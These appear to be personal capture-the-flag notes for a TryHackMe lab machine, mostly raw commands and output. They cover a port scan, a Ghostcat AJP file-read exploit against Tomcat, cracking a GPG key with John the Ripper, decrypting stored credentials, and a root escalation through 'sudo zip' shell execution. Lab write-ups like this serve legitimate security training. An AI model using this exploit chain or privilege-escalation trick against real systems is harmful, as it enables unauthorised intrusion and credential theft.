### PORTS
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30

https://github.com/00theway/Ghostcat-CNVD-2020-10487

python3 ajpShooter.py http://10.10.112.221 8009 /WEB-INF/web.xml read

skyfuck:8730281lkjlkjdqlksalks

cat /home/merlin/user.txt
THM{GhostCat_1s_so_cr4sy}


/home/skyfuck/.gnupg/gpg.conf
/home/skyfuck/.gnupg/pubring.gpg
/home/skyfuck/.gnupg/trustdb.gpg

/usr/sbin/gpg2john tryhackme.asc > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

alexandru        (tryhackme)

gpg --import tryhackme.asc                       

gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:              unchanged: 2
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

                                                         
┌──(kali㉿kali)-[~/github/tryhackme.com/tomghost]
└─$ gpg --decrypt credential.pgp
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

ssh merlin@10.10.112.221

sudo -l

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

id

cat /root/root.txt

